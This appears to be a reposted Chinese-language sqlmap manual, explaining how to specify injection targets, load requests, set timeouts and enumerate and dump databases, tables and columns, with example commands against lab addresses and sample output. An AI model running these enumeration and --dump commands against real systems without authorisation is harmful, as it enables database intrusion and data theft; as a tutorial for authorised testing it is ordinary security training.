温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

SqlMap使用手册

发布时间:2020-07-25 11:03:22 来源:网络 阅读:1309 作者:nw01f 栏目:数据库

0x00 SQLMAP简介

  • sqlmap是一种开源的***测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常大的检测引擎、具有多种特性的***实测器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

  • 支持的数据库:mysql,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB

  • SQL注入技术:错误注入,基于时间的错误注入,报错注入,union注入

  • 枚举数据:users,password hasher,privileges,roles,databases,tables and columns


0x01 Sqlmap扫描等级(共有7个等级,默认为1)

  • 0、只显示python错误以及严重的信息

  • 1、同时显示基本信息和警告信息。(默认)

  • 2、同时显示debug信息

  • 3、同时显示注入的payload

  • 4、同时显示HTTP请求

  • 5、同时显示HTTP响应头

  • 6、同时显示HTTP响应面


0x02 获取目标方式

  • 参数:-u 或 --url

eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]


0x03 从文本中获取多个目标扫描

  • 参数:-m

  • 文件中保存url格式如下,sqlmap会一个一个检测

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*

0x04 从文件中加载HTTP请求

  • 参数: -r

  • sqlmap可以从一个文本中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

0x05 POST方式注入

  • 参数: --data

  • 此参数是吧数据以post方式提交,sqlmap会像检测GET参数一样检测POST的参数。

eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"

0x06 设定超时时间

  • 参数: --timeout

  • 可以设定一个HTTP(S)请求超过多久判定为超时,10.5表示10.5秒,默认是30秒。


0x07 设定重试超时

  • 参数: --retries

  • 当HTTP(S)超时时,可以设定重新尝试连接次数,默认是3次


0x08 测试参数

  • *

  • 在伪静态注入测试时,sqlmap无法直接使用测试参数,可以在想测试参数的参数后面加*

eg:
1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"

0x09 列举数据库系统的数据库

  • 参数:--dbs

  • 当前用户有权限读取包含所有数据库列表信息的表中的时候,即可列出所有的数据库。


0x10 列举数据库表

  • 参数: --tables -D

  • 列举指定数据库 -D xxxx 的所有表。如果不指定-D 则列举所有数据库中的所有表。


0x11 列举书库表中的字段


  • 参数:--columns -T -D

  • 列举指定数库,指定表中的字段。

eg:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

0x12 获取表中数据个数

  • 参数: --count

  • 列举指定数据库表中的数据个数。

eg:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

0x13 获取整个表的数据或某几个字段的数据。

  • --dump -D -T -C

  • 列举某个数据库某个表的所有字段

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
  • 列举某个数据库的某个表的某个字段的数据。

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI